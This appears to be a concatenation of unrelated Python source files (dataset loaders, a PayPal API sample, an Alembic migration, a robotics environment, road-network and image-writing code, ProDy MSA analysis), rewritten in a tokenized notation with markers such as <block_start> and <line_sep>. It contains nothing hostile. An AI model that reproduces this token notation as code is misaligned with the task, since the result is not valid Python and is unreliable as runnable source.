Data after being normalized/transformed.
"""<line_sep><return>data<block_end><def_stmt>augment self data<block_start>"""Preprocessing fn used by TFDS map for augmentation at training time.
This function is for transformations that should not be cached, e.g. random
augmentation that should change for every sample, and are only applied at
training time.
Args:
data: Data sample.
Returns:
Data after being augmented/transformed.
"""<line_sep><return>data<block_end><block_end><class_stmt>ImageDataset(Dataset)<block_start>"""Base class for image datasets."""<line_sep>DATAKEY='image'<def_stmt>preprocess self data<block_start>"""Preprocessing function used by TFDS map for normalization.
This function is for transformations that can be cached, e.g.
normalization/whitening.
Args:
data: Data sample.
Returns:
Data after being normalized/transformed.
"""<line_sep>data=super().preprocess(data)<line_sep># Ensure we only provide the image and label, stripping out other keys.
<return>dict((key val)<for>key,val data.items()<if>key<in>[self.LABELKEY self.DATAKEY])<block_end><block_end>
|
# GetPaymentList Sample
# This sample code demonstrate how you can
# retrieve a list of all Payment resources
# you've created using the Payments API.
# Note various query parameters that you can
# use to filter, and paginate through the
# payments list.
# API used: GET /v1/payments/payments
<import_from_stmt>paypalrestsdk Payment<import_stmt>logging<line_sep>logging.basicConfig(level=logging.INFO)<line_sep># Retrieve
# Retrieve the PaymentHistory by calling the
# `all` method
# on the Payment class
# Refer the API documentation
# for valid values for keys
# Supported paramters are :count, :next_id
payment_history=Payment.all({"count":2})<line_sep># List Payments
print("List Payment:")<for_stmt>payment payment_history.payments<block_start>print(" -> Payment[%s]"%(payment.id))<block_end>
|
"""empty message
Revision ID: <KEY>
Revises: 36954739c63
Create Date: 2015-11-23 21:16:54.103342
"""<line_sep># revision identifiers, used by Alembic.
revision='<KEY>'<line_sep>down_revision='3<PASSWORD>4<PASSWORD>'<import_from_stmt>alembic op<import_stmt>sqlalchemy<as>sa<def_stmt>upgrade ### commands auto generated by Alembic - please adjust! ###
<block_start><with_stmt>op.batch_alter_table('user')<as>batch_op<block_start>batch_op.alter_column('created' existing_type=sa.DATETIME() nullable=<false>)<line_sep>batch_op.alter_column('updated' existing_type=sa.DATETIME() nullable=<false>)<block_end>### end Alembic commands ###
<block_end><def_stmt>downgrade ### commands auto generated by Alembic - please adjust! ###
<block_start><with_stmt>op.batch_alter_table('user')<as>batch_op<block_start>batch_op.alter_column('updated' existing_type=sa.DATETIME() nullable=<true>)<line_sep>batch_op.alter_column('created' existing_type=sa.DATETIME() nullable=<true>)<block_end>### end Alembic commands ###
<block_end>
|
<import_from_stmt>..datasets NLVR2Dataset<import_from_stmt>.datamodule_base BaseDataModule<class_stmt>NLVR2DataModule(BaseDataModule)<block_start><def_stmt>__init__ self *args **kwargs<block_start>super().__init__(*args **kwargs)<block_end>@property<def_stmt>dataset_cls self<block_start><return>NLVR2Dataset<block_end>@property<def_stmt>dataset_name self<block_start><return>"nlvr2"<block_end><block_end>
|
"""Base class of HalfCheetah meta-environments."""<import_from_stmt>gym.envs.mujoco HalfCheetahEnv<as>HalfCheetahEnv_<import_stmt>numpy<as>np<import_from_stmt>garage EnvSpec<class_stmt>HalfCheetahEnvMetaBase(HalfCheetahEnv_)<block_start>"""Base class of HalfCheetah meta-environments.
Code is adapted from
https://github.com/tristandeleu/pytorch-maml-rl/blob/493e677e724aa67a531250b0e215c8dbc9a7364a/maml_rl/envs/mujoco/half_cheetah.py
Which was in turn adapted from
https://github.com/cbfinn/maml_rl/blob/9c8e2ebd741cb0c7b8bf2d040c4caeeb8e06cc95/rllab/envs/mujoco/half_cheetah_env_rand.py
Args:
task (dict): Subclass specific task information.
"""<def_stmt>__init__ self task<block_start>self._task=task<line_sep>super().__init__()<line_sep>self.spec=EnvSpec(action_space=self.action_space observation_space=self.observation_space)<block_end><def_stmt>_get_obs self<block_start>"""Get a low-dimensional observation of the state.
Returns:
np.ndarray: Contains the flattened angle quaternion, angular
velocity quaternion, and cartesian position.
"""<line_sep><return>np.concatenate([self.sim.data.qpos.flat[1:] self.sim.data.qvel.flat self.get_body_com('torso').flat ]).astype(np.float32).flatten()<block_end><def_stmt>viewer_setup self<block_start>"""Start the viewer."""<line_sep>camera_id=self.model.camera_name2id('track')<line_sep>self.viewer.cam.type=2<line_sep>self.viewer.cam.fixedcamid=camera_id<line_sep>self.viewer.cam.distance=self.model.stat.extent<times>0.35<line_sep># Hide the overlay
# This code was inheritted, so we'll ignore this access violation for
# now.
# pylint: disable=protected-access
self.viewer._hide_overlay=<true><block_end><def_stmt>__getstate__ self<block_start>"""See `Object.__getstate__.
Returns:
dict: The instance’s dictionary to be pickled.
"""<line_sep><return>dict(task=self._task)<block_end><def_stmt>__setstate__ self state<block_start>"""See `Object.__setstate__.
Args:
state (dict): Unpickled state of this object.
"""<line_sep>self.__init__(task=state['task'])<block_end><block_end>
|
<import_from_stmt>metadrive.component.road_network.base_road_network BaseRoadNetwork LaneIndex<import_stmt>gc<import_stmt>copy<import_stmt>logging<import_from_stmt>typing List Tuple Dict<import_stmt>numpy<as>np<import_from_stmt>metadrive.component.lane.abs_lane AbstractLane<import_from_stmt>metadrive.component.road_network.road Road<import_from_stmt>metadrive.component.road_network.base_road_network BaseRoadNetwork<import_from_stmt>metadrive.constants Decoration<import_from_stmt>metadrive.utils.math_utils get_boxes_bounding_box<import_from_stmt>metadrive.utils.scene_utils get_lanes_bounding_box<import_from_stmt>collections namedtuple<line_sep>lane_info=namedtuple("neighbor_lanes" "lane entry_lanes exit_lanes left_lanes right_lanes")<class_stmt>EdgeRoadNetwork(BaseRoadNetwork)<block_start>"""
Compared to NodeRoadNetwork representing the relation of lanes in a node-based graph, EdgeRoadNetwork stores the
relationship in edge-based graph, which is more common in real map representation
"""<def_stmt>__init__ self<block_start>super(EdgeRoadNetwork self).__init__()<line_sep>self.graph={}<block_end><def_stmt>add_lane self lane<arrow><none><block_start>self.graph[lane.index]=lane_info(lane=lane entry_lanes=lane.entry_lanes exit_lanes=lane.exit_lanes left_lanes=lane.left_lanes right_lanes=lane.right_lanes)<block_end><def_stmt>get_lane self index:LaneIndex<block_start><return>self.graph[index].lane<block_end><def_stmt>__isub__ self other<block_start><for_stmt>id,lane_info other.graph.items()<block_start>self.graph.pop(id)<block_end><return>self<block_end><def_stmt>add self other no_intersect=<true><block_start><for_stmt>id,lane_info other.graph.items()<block_start><if_stmt>no_intersect<block_start><assert_stmt>id<not><in>self.graph.keys() "Intersect: {} exists in two network".format(id)<block_end>self.graph[id]=other.graph[id]<block_end><return>self<block_end><def_stmt>_get_bounding_box self<block_start>"""
By using this bounding box, the edge length of x, y direction and the center of this road network can be
easily calculated.
:return: minimum x value, maximum x value, minimum y value, maximum y value
"""<line_sep>lanes=[]<for_stmt>id,lane_info, self.graph.items()<block_start>lanes.append(lane_info.lane)<block_end>res_x_max,res_x_min,res_y_max,res_y_min=get_boxes_bounding_box([get_lanes_bounding_box(lanes)])<line_sep><return>res_x_min res_x_max res_y_min res_y_max<block_end><def_stmt>shortest_path self start:str goal:str<block_start><return>next(self.bfs_paths(start goal) [])<block_end><def_stmt>bfs_paths self start:str goal:str<arrow>List[List[str]]<block_start>"""
Breadth-first search of all routes from start to goal.
:param start: starting node
:param goal: goal node
:return: list of paths from start to goal.
"""<line_sep>queue=[(start [start])]<while_stmt>queue<block_start>(node path)=queue.pop(0)<if_stmt>node<not><in>self.graph<block_start><yield>[]<block_end><for_stmt>_next set(self.graph[node].exit_lanes)-set(path)<block_start><if_stmt>_next<eq>goal<block_start><yield>path+[_next]<block_end><elif_stmt>_next<in>self.graph<block_start>queue.append((_next path+[_next]))<block_end><block_end><block_end><block_end><def_stmt>get_peer_lanes_from_index self lane_index<block_start>info:lane_info=self.graph[lane_index]<line_sep>ret=[self.graph[lane_index].lane]<for_stmt>left_n info.left_lanes<block_start>ret.append(self.graph[left_n["id"]].lane)<block_end><for_stmt>right_n info.right_lanes<block_start>ret.append(self.graph[right_n["id"]].lane)<block_end><return>ret<block_end><def_stmt>destroy self<block_start>super(EdgeRoadNetwork self).destroy()<for_stmt>k,v self.graph.items()<block_start>v.lane.destroy()<line_sep>self.graph[k]:lane_info=<none><block_end>self.graph=<none><block_end><def_stmt>__del__ self<block_start>logging.debug("{} is released".format(self.__class__.__name__))<block_end><block_end>
|
<import_stmt>torch<import_stmt>torch.nn<as>nn<import_from_stmt>....datasets.utils DataProcessing<def_stmt>filter_valid_label scores labels num_classes ignored_label_inds device<block_start>"""Loss functions for semantic segmentation."""<line_sep>valid_scores=scores.reshape(-1 num_classes)<line_sep>valid_labels=labels.reshape(-1).to(device)<line_sep>ignored_bool=torch.zeros_like(valid_labels dtype=torch.bool)<for_stmt>ign_label ignored_label_inds<block_start>ignored_bool=torch.logical_or(ignored_bool torch.eq(valid_labels ign_label))<block_end>valid_idx=torch.where(torch.logical_not(ignored_bool))[0].to(device)<line_sep>valid_scores=torch.gather(valid_scores 0 valid_idx.unsqueeze(-1).expand(-1 num_classes))<line_sep>valid_labels=torch.gather(valid_labels 0 valid_idx)<line_sep># Reduce label values in the range of logit shape
reducing_list=torch.arange(0 num_classes dtype=torch.int64)<line_sep>inserted_value=torch.zeros([1] dtype=torch.int64)<for_stmt>ign_label ignored_label_inds<block_start><if_stmt>ign_label<ge>0<block_start>reducing_list=torch.cat([reducing_list[:ign_label] inserted_value reducing_list[ign_label:]] 0)<block_end><block_end>valid_labels=torch.gather(reducing_list.to(device) 0 valid_labels.long())<line_sep><return>valid_scores valid_labels<block_end><class_stmt>SemSegLoss(object)<block_start>"""Loss functions for semantic segmentation."""<def_stmt>__init__ self pipeline model dataset device<block_start>super(SemSegLoss self).__init__()<line_sep># weighted_CrossEntropyLoss
<if_stmt>'class_weights'<in>dataset.cfg.keys()<and>len(dataset.cfg.class_weights)<ne>0<block_start>class_wt=DataProcessing.get_class_weights(dataset.cfg.class_weights)<line_sep>weights=torch.tensor(class_wt dtype=torch.float device=device)<line_sep>self.weighted_CrossEntropyLoss=nn.CrossEntropyLoss(weight=weights)<block_end><else_stmt><block_start>self.weighted_CrossEntropyLoss=nn.CrossEntropyLoss()<block_end><block_end><block_end>
|
""". regress totemp gnpdefl gnp unemp armed pop year
Source | SS df MS Number of obs = 16
-------------+------------------------------ F( 6, 9) = 330.29
Model | 184172402 6 30695400.3 Prob > F = 0.0000
Residual | 836424.129 9 92936.0144 R-squared = 0.9955
-------------+------------------------------ Adj R-squared = 0.9925
Total | 185008826 15 12333921.7 Root MSE = 304.85
------------------------------------------------------------------------------
totemp | Coef. Std. Err. t P>|t| [95% Conf. Interval]
-------------+----------------------------------------------------------------
gnpdefl | 15.06167 84.91486 0.18 0.863 -177.0291 207.1524
gnp | -.0358191 .033491 -1.07 0.313 -.111581 .0399428
unemp | -2.020229 .4883995 -4.14 0.003 -3.125065 -.9153928
armed | -1.033227 .2142741 -4.82 0.001 -1.517948 -.5485049
pop | -.0511045 .2260731 -0.23 0.826 -.5625173 .4603083
year | 1829.151 455.4785 4.02 0.003 798.7873 2859.515
_cons | -3482258 890420.3 -3.91 0.004 -5496529 -1467987
------------------------------------------------------------------------------
"""<line_sep>#From Stata using Longley dataset as in the test and example for GLM
"""
. glm totemp gnpdefl gnp unemp armed pop year
Iteration 0: log likelihood = -109.61744
Generalized linear models No. of obs = 16
Optimization : ML Residual df = 9
Scale parameter = 92936.01
Deviance = 836424.1293 (1/df) Deviance = 92936.01
Pearson = 836424.1293 (1/df) Pearson = 92936.01
Variance function: V(u) = 1 [Gaussian]
Link function : g(u) = u [Identity]
AIC = 14.57718
Log likelihood = -109.6174355 BIC = 836399.2
------------------------------------------------------------------------------
| OIM
totemp | Coef. Std. Err. z P>|z| [95% Conf. Interval]
-------------+----------------------------------------------------------------
gnpdefl | 15.06167 84.91486 0.18 0.859 -151.3684 181.4917
gnp | -.0358191 .033491 -1.07 0.285 -.1014603 .029822
unemp | -2.020229 .4883995 -4.14 0.000 -2.977475 -1.062984
armed | -1.033227 .2142741 -4.82 0.000 -1.453196 -.6132571
pop | -.0511045 .2260731 -0.23 0.821 -.4941996 .3919906
year | 1829.151 455.4785 4.02 0.000 936.4298 2721.873
_cons | -3482258 890420.3 -3.91 0.000 -5227450 -1737066
------------------------------------------------------------------------------
"""<line_sep>#RLM Example
"""
. rreg stackloss airflow watertemp acidconc
Huber iteration 1: maximum difference in weights = .48402478
Huber iteration 2: maximum difference in weights = .07083248
Huber iteration 3: maximum difference in weights = .03630349
Biweight iteration 4: maximum difference in weights = .2114744
Biweight iteration 5: maximum difference in weights = .04709559
Biweight iteration 6: maximum difference in weights = .01648123
Biweight iteration 7: maximum difference in weights = .01050023
Biweight iteration 8: maximum difference in weights = .0027233
Robust regression Number of obs = 21
F( 3, 17) = 74.15
Prob > F = 0.0000
------------------------------------------------------------------------------
stackloss | Coef. Std. Err. t P>|t| [95% Conf. Interval]
-------------+----------------------------------------------------------------
airflow | .8526511 .1223835 6.97 0.000 .5944446 1.110858
watertemp | .8733594 .3339811 2.61 0.018 .1687209 1.577998
acidconc | -.1224349 .1418364 -0.86 0.400 -.4216836 .1768139
_cons | -41.6703 10.79559 -3.86 0.001 -64.447 -18.89361
------------------------------------------------------------------------------
"""<line_sep>
|
var=5<line_sep>a="my string {}".format(var)<line_sep>
|
<import_stmt>png<import_from_stmt>depixel.io_data PixelDataWriter<class_stmt>Bitmap(object)<block_start>mode='RGB'<line_sep>bgcolour=(127 127 127)<def_stmt>__init__ self size bgcolour=<none> mode=<none><block_start><if_stmt>bgcolour<is><not><none><block_start>self.bgcolour=bgcolour<block_end><if_stmt>mode<is><not><none><block_start>self.mode=mode<block_end>self.size=size<line_sep>self.pixels=[]<for_stmt>_ range(self.size[1])<block_start>self.pixels.append([bgcolour]<times>self.size[0])<block_end><block_end><def_stmt>set_pixel self x y value<block_start>self.pixels[y][x]=value<block_end><def_stmt>pixel self x y<block_start><return>self.pixels[y][x]<block_end><def_stmt>set_data self data<block_start><assert_stmt>len(data)<eq>self.size[1]<line_sep>new_pixels=[]<for_stmt>row data<block_start><assert_stmt>len(row)<eq>self.size[0]<line_sep>new_pixels.append(row[:])<block_end>self.pixels=new_pixels<block_end><def_stmt>set_block self x y data<block_start><assert_stmt>0<le>x<le>(self.size[0]-len(data[0]))<assert_stmt>0<le>y<le>(self.size[1]-len(data))<for_stmt>dy,row enumerate(data)<block_start><for_stmt>dx,value enumerate(row)<block_start>self.set_pixel(x+dx y+dy value)<block_end><block_end><block_end><def_stmt>flat_pixels self<block_start>flat_pixels=[]<for_stmt>row self.pixels<block_start>frow=[]<for_stmt>value row<block_start>frow.extend(value)<block_end>flat_pixels.append(frow)<block_end><return>flat_pixels<block_end><def_stmt>write_png self filename<block_start>png.from_array(self.flat_pixels() mode=self.mode).save(filename)<block_end><def_stmt>draw_line self p0 p1 colour<block_start>"""Bresenham's line algorithm."""<line_sep>x0,y0=p0<line_sep>x1,y1=p1<line_sep>dx=abs(x0-x1)<line_sep>dy=abs(y0-y1)<line_sep>sx=1<if>x0<l>x1<else>-1<line_sep>sy=1<if>y0<l>y1<else>-1<line_sep>err=dx-dy<while_stmt>(x0 y0)<ne>(x1 y1)<block_start>self.set_pixel(x0 y0 colour)<line_sep>e2=2<times>err<if_stmt>e2<g>-dy<block_start>err<augsub>dy<line_sep>x0<augadd>+sx<block_end><if_stmt>e2<l>dx<block_start>err<augadd>dx<line_sep>y0<augadd>sy<block_end><block_end>self.set_pixel(x1 y1 colour)<block_end><def_stmt>fill self point colour<block_start>old_colour=self.pixels[point[1]][point[0]]<if_stmt>old_colour<eq>colour<block_start><return><block_end>self.fill_scan(point old_colour colour)<block_end><def_stmt>fill_pix self point old_colour colour<block_start>"""
Pixel flood-fill. Reliable, but slow.
"""<line_sep>to_fill=[point]<while_stmt>to_fill<block_start>x,y=to_fill.pop()<line_sep>self.set_pixel(x y colour)<for_stmt>nx,ny [(x-1 y) (x+1 y) (x y-1) (x y+1)]<block_start><if_stmt>0<le>nx<l>self.size[0]<and>0<le>ny<l>self.size[1]<block_start><if_stmt>self.pixels[ny][nx]<eq>old_colour<block_start>to_fill.append((nx ny))<block_end><block_end><block_end><block_end><block_end><def_stmt>fill_scan self point old_colour colour<block_start>"""
Scanline flood-fill. Fast, but I'm not entirely sure what it's doing.
"""<line_sep>to_fill=[point]<while_stmt>to_fill<block_start>x,y=to_fill.pop()<while_stmt>y<g>0<and>self.pixel(x y-1)<eq>old_colour<block_start>y<augsub>1<block_end>lspan=<false><line_sep>rspan=<false><while_stmt>y<l>self.size[1]<and>self.pixel(x y)<eq>old_colour<block_start>self.set_pixel(x y colour)<if_stmt><not>lspan<and>x<g>0<and>self.pixel(x-1 y)<eq>old_colour<block_start>to_fill.append((x-1 y))<line_sep>lspan=<true><block_end><elif_stmt>lspan<and>x<g>0<and>self.pixel(x-1 y)<eq>old_colour<block_start>lspan=<false><block_end><if_stmt>(<not>rspan<and>x<l>self.size[0]-1<and>self.pixel(x+1 y)<eq>old_colour)<block_start>to_fill.append((x+1 y))<line_sep>rspan=<true><block_end><elif_stmt>(rspan<and>x<l>self.size[0]-1<and>self.pixel(x+1 y)<eq>old_colour)<block_start>rspan=<false><block_end>y<augadd>1<block_end><block_end><block_end><block_end><class_stmt>PixelDataPngWriter(PixelDataWriter)<block_start>FILE_EXT='png'<def_stmt>translate_pixel self pixel<block_start><if_stmt><not>isinstance(pixel (list tuple))# Assume monochrome values normalised to [0, 1].
<block_start><return>(int(255<times>pixel) )<times>3<block_end><return>pixel<block_end><def_stmt>make_drawing self drawing_type _filename<block_start><if_stmt>drawing_type<eq>'pixels'<block_start><return>Bitmap(self.pixel_data.size)<block_end><return>Bitmap((self.pixel_data.size_x<times>self.PIXEL_SCALE+1 self.pixel_data.size_y<times>self.PIXEL_SCALE+1) bgcolour=(127 127 127))<block_end><def_stmt>save_drawing self drawing filename<block_start>drawing.write_png(filename)<block_end><def_stmt>draw_pixel self drawing pt colour<block_start>drawing.set_pixel(pt[0] pt[1] self.translate_pixel(colour))<block_end><def_stmt>draw_line self drawing pt0 pt1 colour<block_start>drawing.draw_line(pt0 pt1 self.translate_pixel(colour))<block_end><def_stmt>draw_polygon self drawing path colour fill<block_start>pt0=path[-1]<for_stmt>pt1 path<block_start>self.draw_line(drawing pt0 pt1 colour)<line_sep>pt0=pt1<block_end>middle=(sum([p[0]<for>p path])/len(path) sum([p[1]<for>p path])/len(path))<line_sep>drawing.fill(middle fill)<block_end><def_stmt>draw_path_shape self drawing paths colour fill<block_start><for_stmt>path paths<block_start>pt0=path[-1]<for_stmt>pt1 path<block_start>self.draw_line(drawing pt0 pt1 colour)<line_sep>pt0=pt1<block_end><block_end>drawing.fill(self.find_point_within(paths fill) fill)<block_end><def_stmt>find_point_within self paths colour<block_start><for_stmt>node,attrs self.pixel_data.pixel_graph.nodes_iter(data=<true>)<block_start><if_stmt>colour<eq>attrs['value']<block_start>pt=self.scale_pt(node (0.5 0.5))<if_stmt>self.is_inside(pt paths)<block_start><return>pt<block_end><block_end><block_end><block_end><def_stmt>is_inside self pt paths<block_start><if_stmt><not>self._is_inside(pt paths[0])# Must be inside the "outside" path.
<block_start><return><false><block_end><for_stmt>path paths[1:]<block_start><if_stmt>self._is_inside(pt path)# Must be outside the "inside" paths.
<block_start><return><false><block_end><block_end><return><true><block_end><def_stmt>_is_inside self pt path<block_start>inside=<false><line_sep>x,y=pt<line_sep>x0,y0=path[-1]<for_stmt>x1,y1 path<block_start><if_stmt>(y0<le>y<l>y1<or>y1<le>y<l>y0)<and>(x0<le>x<or>x1<le>x)# This crosses our ray.
<block_start><if_stmt>(x1+float(y-y1)/(y0-y1)<times>(x0-x1))<l>x<block_start>inside=<not>inside<block_end><block_end>x0,y0=x1 y1<block_end><return>inside<block_end><def_stmt>draw_shapes self drawing element=<none><block_start><for_stmt>shape self.pixel_data.shapes<block_start>paths=[[self.scale_pt(p)<for>p path]<for>path shape['paths']]<line_sep>self.draw_path_shape(drawing paths self.GRID_COLOUR shape['value'])<block_end><block_end><block_end><def_stmt>read_png filename<block_start>_w,_h,pixels,_meta=png.Reader(filename=filename).asRGB8()<line_sep>data=[]<for_stmt>row pixels<block_start>d_row=[]<while_stmt>row<block_start>d_row.append((row.pop(0) row.pop(0) row.pop(0)))<block_end>data.append(d_row)<block_end><return>data<block_end>
|
# -*- coding: utf-8 -*-
"""This module defines MSA analysis functions."""<line_sep>__author__='<NAME>, <NAME>, <NAME>'<import_from_stmt>numbers Integral<import_stmt>os<import_from_stmt>numpy dtype zeros empty ones where ceil shape eye<import_from_stmt>numpy indices tril_indices array ndarray isscalar unique<import_from_stmt>prody LOGGER<import_from_stmt>prody.utilities which MATCH_SCORE MISMATCH_SCORE<import_from_stmt>prody.utilities GAP_PENALTY GAP_EXT_PENALTY ALIGNMENT_METHOD<import_from_stmt>prody.sequence.msa MSA refineMSA<import_from_stmt>prody.sequence.msafile parseMSA writeMSA<import_from_stmt>prody.sequence.sequence Sequence<import_from_stmt>prody.atomic Atomic<import_from_stmt>prody.measure calcDistance<import_from_stmt>Bio pairwise2<import_stmt>sys<line_sep>__all__=['calcShannonEntropy' 'buildMutinfoMatrix' 'calcMSAOccupancy' 'applyMutinfoCorr' 'applyMutinfoNorm' 'calcRankorder' 'filterRankedPairs' 'buildSeqidMatrix' 'uniqueSequences' 'buildOMESMatrix' 'buildSCAMatrix' 'buildDirectInfoMatrix' 'calcMeff' 'buildPCMatrix' 'buildMSA' 'showAlignment' 'alignTwoSequencesWithBiopython' 'alignSequenceToMSA' 'calcPercentIdentities' 'alignSequencesByChain' 'trimAtomsUsingMSA']<line_sep>doc_turbo="""
By default, *turbo* mode, which uses memory as large as the MSA array
itself but runs four to five times faster, will be used. If memory
allocation fails, the implementation will fall back to slower and
memory efficient mode."""<def_stmt>calcPercentIdentities msa<block_start>percent_ids=[]<line_sep>aas=['A' 'C' 'D' 'E' 'F' 'G' 'H' 'I' 'J' 'K' 'L' 'M' 'N' 'P' 'Q' 'R' 'S' 'T' 'V' 'W' 'Y' '-']<for_stmt>i range(len(msa))<block_start>col_list=list(msa.getArray()[: i])<line_sep>max_count=0<for_stmt>aa aas<block_start><if_stmt>col_list.count(aa)<g>max_count<block_start>max_count=col_list.count(aa)<block_end><block_end>percent_ids.append(float(max_count)/float(len(col_list))<times>100)<block_end><return>percent_ids<block_end><def_stmt>getMSA msa<block_start>"""Returns MSA character array."""<try_stmt><block_start>msa=msa._getArray()<block_end><except_stmt>AttributeError<block_start><pass><block_end><try_stmt><block_start>dtype_,ndim,shape=msa.dtype msa.ndim msa.shape<block_end><except_stmt>AttributeError<block_start><raise>TypeError('msa must be an MSA instance or a 2D character array')<block_end><if_stmt>dtype_<ne>dtype('|S1')<or>ndim<ne>2<block_start><raise>TypeError('msa must be an MSA instance or a 2D character array')<block_end><return>msa<block_end><def_stmt>calcShannonEntropy msa ambiguity=<true> omitgaps=<true> **kwargs<block_start>"""Returns Shannon entropy array calculated for *msa*, which may be
an :class:`.MSA` instance or a 2D Numpy character array. Implementation
is case insensitive and handles ambiguous amino acids as follows:
* **B** (Asx) count is allocated to *D* (Asp) and *N* (Asn)
* **Z** (Glx) count is allocated to *E* (Glu) and *Q* (Gln)
* **J** (Xle) count is allocated to *I* (Ile) and *L* (Leu)
* **X** (Xaa) count is allocated to the twenty standard amino acids
Selenocysteine (**U**, Sec) and pyrrolysine (**O**, Pyl) are considered
as distinct amino acids. When *ambiguity* is set **False**, all alphabet
characters as considered as distinct types.
All non-alphabet characters are considered as gaps, and they are handled
in two ways:
* non-existent, the probability of observing amino acids in a given
column is adjusted, by default
* as a distinct character with its own probability, when *omitgaps* is
**False**"""<line_sep>msa=getMSA(msa)<line_sep>length=msa.shape[1]<line_sep>entropy=empty(length float)<import_from_stmt>.msatools msaentropy<line_sep><return>msaentropy(msa entropy ambiguity=bool(ambiguity) omitgaps=bool(omitgaps))<block_end><def_stmt>buildMutinfoMatrix msa ambiguity=<true> turbo=<true> **kwargs<block_start>"""Returns mutual information matrix calculated for *msa*, which may be an
:class:`.MSA` instance or a 2D Numpy character array. Implementation
is case insensitive and handles ambiguous amino acids as follows:
* **B** (Asx) count is allocated to *D* (Asp) and *N* (Asn)
* **Z** (Glx) count is allocated to *E* (Glu) and *Q* (Gln)
* **J** (Xle) count is allocated to *I* (Ile) and *L* (Leu)
* **X** (Xaa) count is allocated to the twenty standard amino acids
* Joint probability of observing a pair of ambiguous amino acids is
allocated to all potential combinations, e.g. probability of **XX**
is allocated to 400 combinations of standard amino acids, similarly
probability of **XB** is allocated to 40 combinations of *D* and *N*
with the standard amino acids.
Selenocysteine (**U**, Sec) and pyrrolysine (**O**, Pyl) are considered
as distinct amino acids. When *ambiguity* is set **False**, all alphabet
characters as considered as distinct types. All non-alphabet characters
are considered as gaps.
Mutual information matrix can be normalized or corrected using
:func:`applyMINormalization` and :func:`applyMICorrection` methods,
respectively. Normalization by joint entropy can performed using this
function with *norm* option set **True**."""<line_sep>msa=getMSA(msa)<import_from_stmt>.msatools msamutinfo<line_sep>LOGGER.timeit('_mutinfo')<line_sep>length=msa.shape[1]<line_sep>mutinfo=empty((length length) float)<line_sep>mutinfo=msamutinfo(msa mutinfo ambiguity=bool(ambiguity) turbo=bool(turbo) norm=bool(kwargs.get('norm' <false>)) debug=bool(kwargs.get('debug' <false>)))<line_sep>LOGGER.report('Mutual information matrix was calculated in %.2fs.' '_mutinfo')<line_sep><return>mutinfo<block_end>buildMutinfoMatrix.__doc__<augadd>doc_turbo<def_stmt>calcMSAOccupancy msa occ='res' count=<false><block_start>"""Returns occupancy array calculated for residue positions (default,
``'res'`` or ``'col'`` for *occ*) or sequences (``'seq'`` or ``'row'``
for *occ*) of *msa*, which may be an :class:`.MSA` instance or a 2D
NumPy character array. By default, occupancy [0-1] will be calculated.
If *count* is **True**, count of non-gap characters will be returned.
Implementation is case insensitive."""<import_from_stmt>.msatools msaocc<line_sep>msa=getMSA(msa)<try_stmt><block_start>dim=occ.startswith('res')<or>occ.startswith('col')<block_end><except_stmt>AttributeError<block_start><raise>TypeError('occ must be a string')<block_end>occ=zeros(msa.shape[int(dim)] float)<line_sep><return>msaocc(msa occ dim count=bool(count))<block_end><def_stmt>applyMutinfoNorm mutinfo entropy norm='sument'<block_start>"""Apply one of the normalizations discussed in [MLC05]_ to *mutinfo*
matrix. *norm* can be one of the following:
* ``'sument'``: :math:`H(X) + H(Y)`, sum of entropy of columns
* ``'minent'``: :math:`min\{H(X), H(Y)\}`, minimum entropy
* ``'maxent'``: :math:`max\{H(X), H(Y)\}`, maximum entropy
* ``'mincon'``: :math:`min\{H(X|Y), H(Y|X)\}`, minimum conditional
entropy
* ``'maxcon'``: :math:`max\{H(X|Y), H(Y|X)\}`, maximum conditional
entropy
where :math:`H(X)` is the entropy of a column, and
:math:`H(X|Y) = H(X) - MI(X, Y)`. Normalization with joint entropy, i.e.
:math:`H(X, Y)`, can be done using :func:`.buildMutinfoMatrix` *norm*
argument.
.. [MLC05] <NAME>, <NAME>, <NAME>, <NAME>. Using information theory
to search for co-evolving residues in proteins. *Bioinformatics*
**2005** 21(22):4116-4124."""<try_stmt><block_start>ndim,shape=mutinfo.ndim mutinfo.shape<block_end><except_stmt>AttributeError<block_start><raise>TypeError('mutinfo must be a 2D square array')<block_end><if_stmt>ndim<ne>2<or>shape[0]<ne>shape[1]<block_start><raise>ValueError('mutinfo must be a 2D square array')<block_end><try_stmt><block_start>ndim,shapent=entropy.ndim entropy.shape<block_end><except_stmt>AttributeError<block_start><raise>TypeError('entropy must be a numpy array')<block_end><if_stmt>ndim<ne>1<block_start><raise>ValueError('entropy must be a 1D array')<block_end><if_stmt>shapent[0]<ne>shape[0]<block_start><raise>ValueError('shape of mutinfo and entropy does not match')<block_end><try_stmt><block_start>sw=norm.startswith<block_end><except_stmt>AttributeError<block_start><raise>TypeError('norm must be a string')<block_end><if_stmt>sw('sument')<block_start>norm=<lambda>i_val j_val val:i_val+j_val<block_end><elif_stmt>sw('minent')<block_start>norm=<lambda>i_val j_val val:min(i_val j_val)<block_end><elif_stmt>sw('maxent')<block_start>norm=<lambda>i_val j_val val:max(i_val j_val)<block_end><elif_stmt>sw('mincon')<block_start>norm=<lambda>i_val j_val val:min(i_val-val j_val-val)<block_end><elif_stmt>sw('maxcon')<block_start>norm=<lambda>i_val j_val val:max(i_val-val j_val-val)<block_end><elif_stmt>sw('joint')<block_start><raise>ValueError('for joint entropy normalization, use '<concat>'buildMutinfoMatrix function')<block_end><else_stmt><block_start><raise>ValueError('norm={0} is not a valid normalization type'.format(norm))<block_end>mi=mutinfo.copy()<for_stmt>i,i_val enumerate(entropy)<block_start><for_stmt>j,j_val enumerate(entropy)<block_start>val=mi[i j]<line_sep>div=norm(i_val j_val val)<if_stmt>div<eq>0<block_start>mi[i j]=0<block_end><else_stmt><block_start>mi[i j]<augdiv>div<block_end><block_end><block_end><return>mi<block_end><def_stmt>applyMutinfoCorr mutinfo corr='prod'<block_start>"""Returns a copy of *mutinfo* array after average product correction
(default) or average sum correction is applied. See [DSD08]_ for details.
.. [DSD08] <NAME>, <NAME>, <NAME>. Mutual information without the
influence of phylogeny or entropy dramatically improves residue
